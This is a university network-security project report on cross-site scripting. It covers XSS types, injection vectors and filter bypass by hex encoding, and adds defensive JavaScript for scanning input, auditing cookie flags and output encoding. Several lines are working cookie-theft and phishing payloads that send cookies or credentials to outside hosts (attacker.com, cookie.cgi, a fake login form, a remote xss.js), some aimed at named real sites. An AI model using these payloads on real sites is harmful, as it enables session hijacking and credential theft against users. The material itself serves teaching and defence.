HCMC Campus
NETWORK SECURITY
PROJECT REPORT FOR THE NETWORK SECURITY COURSE
Table of Contents
I. GENERAL INTRODUCTION
II. INTRODUCTION TO XSS
1. Understanding XSS
2. The two forms of XSS
2.1. Stored XSS
2.2. Reflected XSS
3. How dangerous XSS is
4. The targets of XSS
III. HOW XSS WORKS
IV. BEING WARY OF XSS
V. TESTING FOR XSS
1. Using tools
2. Testing by hand with code
VI. EXPLOITING XSS
1. Summary of the steps
2. Methods
2.1. Stealing cookies
2.2. Stealing accounts
2.3. XSS attacks via Flash
3. Attackers using XSS for phishing
4. Bypassing character filters
XSS is a dangerous attack: it lets the attacker steal information from the victim's machine through JavaScript, for example by stealing cookies, or inject malicious code to take control.
XSS is one of the most common web vulnerabilities; a very large number of websites are affected by it, which is why more and more people are paying attention to it.
Recently, Brian Krebs of the Washington Post reported that thousands of insecure websites had been identified in the previous year, and the site Xssed.com published a list of nearly 13,000 pages with cross-site scripting (XSS) vulnerabilities.
Example 1: A URL into which a hacker has inserted a script to read the user's cookie.
http://www.oracle.co.jp/mts_sem_owa/MTS_SEM/im_search_exe?search_text=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E
III. HOW XSS WORKS
XSS lets the attacker inject code into a link (the URL of a page) that then runs in the user's browser, leading to the loss of cookies, passwords or sessions, or to malware being planted.
A typical XSS payload looks like this:
http://www.xxx.vn//index.php?pg=news&cat=<script>alert('Lỗi XSS')</script>
and what appears in the browser is a popup containing the text "Lỗi XSS".
Example 1 above only illustrates the simplest case: adding your own code to the web page through the URL. In practice there are many ways to add JavaScript for an XSS attack. A hacker can easily use the Document Object Model (DOM) to change the context and content of the web application.
Example 2: The following is a list of places where code can be injected:
<a href="javascript#[code]">
<div onmouseover="[code]">
<img src="javascript:[code]">
<img dynsrc="javascript:[code]">
<input type="image" dynsrc="javascript:[code]">
<bgsound src="javascript:[code]">
&<script>[code]</script>
&{[code]};
<img src=&{[code]};>
<link rel="stylesheet" href="javascript:[code]">
<iframe src="vbscript:[code]">
<img src="mocha:[code]">
<img src="livescript:[code]">
<a href="about:<script>[code]</script>">
<meta http-equiv="refresh" content="0;url=javascript:[code]">
<body onload="[code]">
Note that this list dates from the Internet Explorer and Netscape era: the dynsrc, bgsound, &{...}, mocha:, livescript: and vbscript: forms, and javascript: URLs in img src, rely on browser behaviour that no longer exists. The event-handler forms (onmouseover, onload) and javascript: in a href still work in current browsers.
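The following is an added example, not code from the original report: a triage scanner for the injection points listed above. It undoes the obfuscation those vectors rely on (mixed case, numeric or named entities, whitespace or control characters inside a URL scheme) and reports which pattern matched, so it can flag suspicious input in logs or test suites. It is a blocklist and therefore not a sanitiser; output encoding (section VII) remains the real defence. The sample inputs are constructed from the list with [code] replaced by alert(1). Runs under Node.js.

```javascript
// Added example, not from the original report: a triage scanner for the injection
// points listed above. It undoes the obfuscation those vectors rely on (mixed case,
// numeric/named entities, whitespace or control characters inside a URL scheme) and
// reports which pattern matched. Use it to flag suspicious input in logs or tests;
// it is a blocklist and therefore not a sanitiser (see section VII for the real fix).
// Node.js; the sample inputs are constructed from the list, with [code] = alert(1).

const NAMED_ENTITIES = { lt: '<', gt: '>', quot: '"', amp: '&', apos: "'" };

// Code point -> character, ignoring values outside the Unicode range (fromCodePoint would throw).
function cp(n) {
  return n <= 0x10ffff ? String.fromCodePoint(n) : '';
}

// Decode the entity forms browsers accept in attributes, including a missing trailing ';'.
function decodeEntities(html) {
  return String(html)
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => cp(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => cp(parseInt(d, 10)))
    .replace(/&(lt|gt|quot|amp|apos);/gi, (_, n) => NAMED_ENTITIES[n.toLowerCase()]);
}

// Regex for a URL scheme that tolerates whitespace/control characters between its letters
// ("jav&#x09;ascript:" becomes "jav\tascript:" after decoding and must still match).
function schemeRegex(scheme) {
  const letters = scheme.split('').map((c) => c + '[\\s\\x00-\\x1f]*').join('');
  return new RegExp('(?:^|[\\s"\'=])' + letters + ':', 'i');
}

const RULES = [
  { id: 'script-tag',        re: /<\s*script\b/i },                       // <script>, about:<script>
  { id: 'event-handler',     re: /[\s"'/]on[a-z]+\s*=/i },                // onmouseover=, onload=
  { id: 'javascript-url',    re: schemeRegex('javascript') },             // href/src/url=javascript:
  { id: 'vbscript-url',      re: schemeRegex('vbscript') },               // <iframe src="vbscript:">
  { id: 'legacy-script-url', re: /(?:^|[\s"'=])(?:mocha|livescript):/i }, // Netscape-era schemes
  { id: 'entity-script',     re: /&\{/ },                                  // &{[code]}; (Netscape 4)
];

// Returns the ids of every rule that fires on the decoded input (empty array = nothing found).
function scan(html) {
  const decoded = decodeEntities(html);
  return RULES.filter((r) => r.re.test(decoded)).map((r) => r.id);
}

// Constructed samples: vectors from the list above plus benign text.
const SAMPLES = {
  'a-href':         '<a href="javascript:alert(1)">click</a>',
  'img-obfuscated': '<IMG SRC="jav&#x09;ascript:alert(1)">',
  'div-handler':    '<div onmouseover="alert(1)">hover</div>',
  'iframe-vb':      '<iframe src="vbscript:msgbox(1)"></iframe>',
  'entity-form':    '<img src=&{alert(1)};>',
  'benign':         '<p>Hello, world. Tom &amp; Jerry are <b>on</b> the list.</p>',
};

for (const [name, html] of Object.entries(SAMPLES)) {
  console.log(name.padEnd(16), scan(html).join(', ') || '(clean)');
}
```

The normalisation step matters more than the patterns: without entity decoding and the scheme regex, the second sample (a tab hidden inside "javascript" as &#x09;) passes a plain string search, which is exactly the kind of trick the hex-encoded links later in this report rely on.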
...against the client side of the website, whose direct victims are the visitors browsing that site.
Of course, hackers sometimes also use this technique to deface websites, but that is still only an attack on the surface of the website.
Indeed, XSS payloads are client-side scripts: they run only in the client's browser, so XSS does not by itself compromise the web server. Note, however, that script running in a logged-in user's browser can send requests to the server on that user's behalf, so server-side data can still be changed through the victim.
The targets of XSS are none other than the other users of the website: when they unknowingly open pages containing the dangerous code left behind by the hacker, they can be redirected to other websites, have their homepage reset, or worse, lose passwords and cookies, and their computers may even be infected with viruses, backdoors, worms and so on.
In XSS attacks the links used by the hacker are usually encoded, so users find them hard to recognise. Below is the hex (percent) encoding of the characters commonly used in XSS payloads in the browser's address bar.
Example 3: A hex-encoded address.
http://vieclambank.com/search.php?s=">%3C%73%63%72%69%70%74%20%73%72%63%25%33%44%68%74%74%70%25%33%41%25%32%46%25%32%46%6A%73%6E%67%6F%63%2E%76%6E%6E%2E%6D%73%25%32%46%78%73%73%2E%6A%73%3E%3C%25%32%46%73%63%72%69%70%74%3E
IV. BEING WARY OF XSS
There is probably no need to list the dangers of XSS again; in practice, once you understand a little about XSS you no longer need to fear it. You really can avoid being hit by XSS attacks if you understand them well.
Any HTML tag can be a tool for an XSS attack, and two tags in particular, IMG and IFRAME, can make your browser load other websites when the HTML is rendered. An example is the BadTrans worm, which used an IFRAME tag to spread through systems using Outlook or Outlook Express:
--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
boundary="====_ABC0987654321DEF_===="
--====_ABC0987654321DEF_====
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
--====_ABC0987654321DEF_====--
--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="filename.ext.ext"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>
Sometimes, while reading mail, you are suddenly taken to another website; have you considered that you may have lost a password? In the past, large numbers of Yahoo mailboxes lost their passwords or had their mail read without any obvious cause. Probably this happened when people opened messages without being wary of XSS: attachments are not the only thing that can hurt you. A single piece of HTML sent in a message is enough for you to lose your cookie:
<form action="http://attacker.com/save.asp" method="post" name="XSS">
<input type="hidden" name="cookie">
</form>
<img border="0" onmouseover="window.document.XSS.cookie.value = document.cookie; window.document.XSS.submit();" src="none.jpg">
So when you receive the message, if you happen to move the mouse over the attached image, your cookie is taken. With the stolen cookie, the hacker can easily log in to your mailbox without knowing your password. (Cookies flagged HttpOnly are not readable through document.cookie, which is why a session cookie should always carry that flag.) I was genuinely surprised to find that Yahoo, which blocked most threats from HTML tags, let the IMG tag through. By 12/7/2003 Yahoo had patched this serious hole, but that is no reason to drop your guard against website "bugs". If you come across a link of the form:
http://example.com/s...document.cookie)</script>
you will certainly look at it carefully before clicking; you might turn off JavaScript in your browser before clicking, or at least be a little cautious. But what if you come across a link like this one:
http://example.com/s...72%79%3D<script>
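The onmouseover payload above works only because document.cookie can read the session cookie. The following is an added example, not part of the original report: it parses Set-Cookie headers (constructed samples, not captured from any real site) and reports session cookies that an injected script could still read, or that travel unprotected, next to the hardened form a server should emit. The list of session-cookie names is an assumed heuristic, not a standard. Runs under Node.js.

```javascript
// Added example, not part of the original report. The onmouseover payload above
// works only because document.cookie can read the session cookie. A cookie sent with
// the HttpOnly attribute is never exposed to script, so this check parses Set-Cookie
// headers (constructed samples below) and reports session cookies that an XSS payload
// could still read or that travel unprotected. Assumed: the list of session-cookie
// names is a heuristic, not a standard; adjust it for the framework in use. Node.js.

// Minimal Set-Cookie parser: name=value plus the attributes that matter here.
function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(';').map((p) => p.trim());
  const eq = pair.indexOf('=');
  const cookie = {
    name: eq === -1 ? pair : pair.slice(0, eq),
    value: eq === -1 ? '' : pair.slice(eq + 1),
    httpOnly: false,
    secure: false,
    sameSite: null,
  };
  for (const attr of attrs) {
    const [key, val = ''] = attr.split('=');
    switch (key.toLowerCase()) {
      case 'httponly': cookie.httpOnly = true; break;
      case 'secure':   cookie.secure = true; break;
      case 'samesite': cookie.sameSite = val.toLowerCase(); break;
      default: break; // Path, Domain, Expires, Max-Age are irrelevant to this check
    }
  }
  return cookie;
}

// Heuristic (assumed) list of names that usually carry the login session.
const SESSION_NAMES = /^(phpsessid|jsessionid|asp\.net_sessionid|sessionid|sid|session|connect\.sid)$/i;

// Findings for every session cookie that injected script could read or that is sent unprotected.
function auditCookies(setCookieHeaders) {
  const findings = [];
  for (const header of setCookieHeaders) {
    const c = parseSetCookie(header);
    if (!SESSION_NAMES.test(c.name)) continue;
    if (!c.httpOnly) findings.push(`${c.name}: readable via document.cookie (missing HttpOnly)`);
    if (!c.secure) findings.push(`${c.name}: may be sent over plain HTTP (missing Secure)`);
    if (c.sameSite !== 'lax' && c.sameSite !== 'strict') findings.push(`${c.name}: no SameSite=Lax/Strict`);
  }
  return findings;
}

// What document.cookie would hand to the payload: every cookie except the HttpOnly ones,
// in the "name=value; name=value" form the browser uses.
function scriptVisibleCookies(setCookieHeaders) {
  return setCookieHeaders
    .map(parseSetCookie)
    .filter((c) => !c.httpOnly)
    .map((c) => `${c.name}=${c.value}`)
    .join('; ');
}

// The hardened form a server should emit for its session cookie.
function hardenedSetCookie(name, value) {
  return `${name}=${value}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Constructed Set-Cookie headers: a weak session cookie, a harmless preference, a hardened session.
const SAMPLE_HEADERS = [
  'PHPSESSID=abc123; Path=/',
  'theme=dark; Path=/',
  'JSESSIONID=xyz789; Path=/; HttpOnly; Secure; SameSite=Lax',
];

console.log(auditCookies(SAMPLE_HEADERS));
console.log('document.cookie would show:', scriptVisibleCookies(SAMPLE_HEADERS));
```

HttpOnly closes the cookie-theft path shown above but not the XSS itself: script that runs in the victim's browser can still send authenticated requests from that browser, so the flag is a damage limiter, not a fix for the injection.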
document.body.innerHTML = '<img src=images/system/logo_main.gif alt=VieclamBank width=230 height=48 border=0><BR><br><br><center>Login information<BR><form action=http://www.hostupfile.com/cookie.php method=POST><table><TR><TD>Username:</TD><TD><input name=ten></TD></TR><TR><TD>Password:</TD><TD><input name=mk type=password></TD></TR><TR><TD></TD><TD><input type=submit value=Login></TD></TR></table></form></center>'
Third: we open a link with an attention-grabbing introduction or announcement (whose hostname is that of the site affected by XSS). Create a link of the following form and send it by mail or post it on the XSS-affected site (the script tag is appended after the hostname):
http://hostxss.com/search.php?s="><script src%3Dhttp%3A%2F%2Fjsngoc.vnn.ms%2Fxss.js><%2Fscript>
On the user's side a fake page (phishing site) then appears. The user does not notice, and when they log in, their cookie or username and password are saved in the file info.txt on the hacker's server.
The example above makes a dialog appear containing the cookie of the web page hosting the Flash file. The page has thus been attacked by injecting JavaScript into the web application through a Flash file. A clearer example of this attack is the following: this is the code in the Flash file, executed as soon as the Flash file is loaded:
getURL("javascript:location='http://www.attacker.com?newcookie='+document.cookie")
So when a user views the page containing this Flash file, the cookie that the hosting page set for them is immediately sent to the hacker. (Flash Player reached end of life at the end of 2020 and current browsers no longer run SWF content, so this vector is now historical.)
...h/swflash.cab#version=6,0,0,0"
WIDTH="60"
HEIGHT="48"
id="1"
ALIGN="">
<PARAM NAME=movie VALUE="http://www.ke_tan_cong.com/vidu.swf">
<PARAM NAME=quality VALUE=high>
<PARAM NAME=bgcolor VALUE=#FF9900>
<EMBED src="http://www.ke_tan_cong.com/vidu.swf"
quality=high
bgcolor=#FF9900
WIDTH="60"
HEIGHT="48"
NAME="1"
ALIGN=""
TYPE="application/x-shockwave-flash"
PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer">
</EMBED>
</OBJECT>
You can also use the window open and close functions to redirect the browser to any other page you want.
A nicer way: use document.write to print a div 1024 pixels wide and 800 high, with position: absolute, left: 0, top: 0. The div just created covers the entire screen, and the user is now on the attacker's phishing page!
Attackers can use this bug for phishing on payment systems, games, shopping sites, banks, credit institutions and so on, or to plant malware!
4. Bypassing character filters
Many careful coders strip all special characters such as ' or + to prevent commands being injected through the URL for SQL injection or XSS, but a skilled attacker gets around this easily by hex-encoding the payload instead:
----------------------------------Hex Usage:
http://www.sitebiXSS.com/a.php?variable=%22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%27%68%74%74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72%69%74%79%2e%63%6f%6d%2f%63%67%69%2d%62%69%6e%2f%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e
(decoded, this is "><script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi?' +document.cookie</script>)
This works whenever the filter inspects the raw query string before the server percent-decodes it; a filter that runs after decoding sees the characters again. That is also why blocklists are not a dependable defence and output encoding (section VII) is.
--------------------------------sites that convert text to hex:
http://www.swingnote.com/tools/txt2hex.php or http://ha.ckers.org/xss.html
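The following is an added example, not code from the original report. It shows why the "Hex Usage" link above slips past a filter that strips ' and + from the raw query string, and why the same filter applied after percent-decoding catches it; it also unfolds the double-encoded link of example 3 (section III). The two URLs are the ones quoted in the report; decodeURIComponent is the same decoding a server framework or browser performs. Runs under Node.js with no network access.

```javascript
// Added example, not part of the original report: why the "Hex Usage" link above
// slips past a filter that strips ' and + from the raw query string, and why the same
// filter applied after percent-decoding catches it. The two URLs are the ones quoted
// in the report (section 4 and example 3 in section III); decodeURIComponent is the
// same decoding a server framework or browser performs. Node.js, no network access.

// Section 4's hex link, on one line (the report splits it across lines).
const HEX_LINK =
  'http://www.sitebiXSS.com/a.php?variable=%22%3e%3c%73%63%72%69%70%74%3e' +         // "><script>
  '%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%27' +                      // document.location='
  '%68%74%74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72%69%74%79%2e%63%6f%6d' + // http://www.cgisecurity.com
  '%2f%63%67%69%2d%62%69%6e%2f%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b' +           // /cgi-bin/cookie.cgi?' +
  '%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e';         // document.cookie</script>

// Example 3's link. %25 is '%', so %25%33%44 decodes to the literal text %3D and only
// a second decode yields '=' (double encoding).
const EXAMPLE3_LINK =
  'http://vieclambank.com/search.php?s=">' +
  '%3C%73%63%72%69%70%74%20' +                // <script
  '%73%72%63%25%33%44' +                      // src%3D
  '%68%74%74%70%25%33%41%25%32%46%25%32%46' + // http%3A%2F%2F
  '%6A%73%6E%67%6F%63%2E%76%6E%6E%2E%6D%73' + // jsngoc.vnn.ms
  '%25%32%46%78%73%73%2E%6A%73%3E' +          // %2Fxss.js>
  '%3C%25%32%46%73%63%72%69%70%74%3E';        // <%2Fscript>

// Value of one query parameter exactly as it sits in the URL, with no decoding at all.
function rawParam(url, name) {
  const query = url.split('?')[1] || '';
  for (const pair of query.split('&')) {
    const i = pair.indexOf('=');
    if (i !== -1 && pair.slice(0, i) === name) return pair.slice(i + 1);
  }
  return null;
}

// Percent-decode repeatedly until nothing changes, so double-encoded payloads unfold too.
// Stops on malformed %xx sequences instead of throwing.
function decodeFully(value, maxRounds = 3) {
  let current = value;
  for (let round = 0; round < maxRounds; round++) {
    let next;
    try { next = decodeURIComponent(current); } catch (e) { break; }
    if (next === current) break;
    current = next;
  }
  return current;
}

// The "careful coder's" blocklist from section 4, extended with < and >.
const BLOCKLIST = /['+<>]/g;

// Filter applied to the parameter as received: the bypass case.
function naiveFilter(rawValue) {
  return rawValue.replace(BLOCKLIST, '');
}

// Filter applied after decoding: it now sees the characters the payload was hiding.
function decodeThenFilter(rawValue) {
  return decodeFully(rawValue).replace(BLOCKLIST, '');
}

// Does a value, as the browser will finally see it, still contain a script tag?
function containsScriptTag(value) {
  return /<script[\s>]/i.test(value);
}

const raw = rawParam(HEX_LINK, 'variable');
console.log('decoded payload      :', decodeFully(raw));
console.log('naive filter removes :', raw.length - naiveFilter(raw).length, 'characters'); // 0
console.log('still a script tag   :', containsScriptTag(decodeFully(naiveFilter(raw))));   // true
console.log('decode-then-filter   :', containsScriptTag(decodeThenFilter(raw)));           // false
console.log('example 3 unfolds to :', decodeFully(rawParam(EXAMPLE3_LINK, 's')));
```

Wherever the filter is placed, a blocklist remains the wrong tool: it has to anticipate every encoding an attacker might stack, whereas encoding on output (section VII) neutralises the characters regardless of how they arrived.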
VII. DEFENDING AGAINST XSS
Characters that must be encoded before user data is written into a page, and the HTML entity to use for each:
> &gt;
( &#40;
) &#41;
# &#35;
& &amp;
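The following is an added example, not code from the original report: output encoding for the table above, which makes the listed characters inert when user data is written into a page. Besides >, (, ), # and & it also encodes <, " and ', which are needed in text and attribute contexts. The search-page markup is a constructed stand-in for the kind of page hit by example 1; the "> prefix comes from the hex payload in section 4. Runs under Node.js.

```javascript
// Added example, not part of the original report: output encoding for the table above,
// which makes the listed characters inert when user data is written into a page. Besides
// >, (, ), # and & it also encodes <, " and ', which are needed in text and attribute
// contexts. The search-page markup is a constructed stand-in for the kind of page
// hit by example 1; the hex payload prefix "> comes from section 4. Node.js.

const HTML_ENTITIES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
  '(': '&#40;',
  ')': '&#41;',
  '#': '&#35;',
};

// One pass over the string, so a literal & in the input is encoded exactly once
// and no replacement can be re-interpreted by a later one.
function escapeHtml(value) {
  return String(value).replace(/[&<>"'()#]/g, (ch) => HTML_ENTITIES[ch]);
}

// The reflected-XSS shape of example 1: the search term is echoed straight into the page.
function renderSearchUnsafe(term) {
  return '<p>Results for: ' + term + '</p>';
}

// Hardened: the term is encoded for the HTML text context it lands in.
function renderSearchSafe(term) {
  return '<p>Results for: ' + escapeHtml(term) + '</p>';
}

// Attribute context: the closing quote is encoded, so the "> prefix used by the
// report's hex payloads cannot close the attribute and start a tag.
function renderInputSafe(term) {
  return '<input name="s" value="' + escapeHtml(term) + '">';
}

const PAYLOAD = '<script>alert(document.cookie)</script>'; // example 1
const ATTR_PAYLOAD = '"><script>alert(1)</script>';         // attribute break-out

console.log(renderSearchUnsafe(PAYLOAD));   // script tag survives
console.log(renderSearchSafe(PAYLOAD));     // rendered as harmless text
console.log(renderInputSafe(ATTR_PAYLOAD)); // stays inside value="..."
```

The encoding has to match the context: this function is right for HTML text and quoted attribute values; data written into a JavaScript block, a CSS rule or a URL needs the encoding rules of that context instead.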
2. For users
Configure the browser to ask whether scripting languages may run on the machine; the user then decides based on how much they trust the site.
Firefox: install the YesScript add-on to control scripts from websites.
IE: go to Options/Settings/... and disable scripting.
The same applies to Google Chrome and other browsers.
When visiting a new website, think before clicking links, and in email check links and advertising images very carefully. In short, we are safer the more vigilant we are.